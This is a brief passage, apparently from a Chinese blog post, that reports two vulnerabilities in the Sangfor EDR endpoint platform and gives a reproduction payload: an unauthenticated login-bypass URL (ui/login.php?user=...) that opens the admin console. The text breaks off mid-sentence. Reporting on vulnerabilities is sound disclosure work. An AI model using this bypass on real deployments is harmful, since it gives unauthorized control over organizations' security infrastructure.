深信服 EDR終端檢測響應平臺免登陸後臺漏洞代碼分析

睡了一覺起來,什麼鬼,深信服 EDR終端檢測響應平臺又出事了,又爆出了兩個漏洞,一個是官方公佈的升級包中泄漏了源代碼,一個是未授權訪問,不使用賬號、密碼就可直接登陸管理後臺。我滴天啦! 復現: payload:https://ip:prot/ui/login.php?user=隨便寫一點兒字母 例如: 在登錄框訪問https://ip:prot/ui/login.php?user=qwer,然後回
相關文章
相關標籤/搜索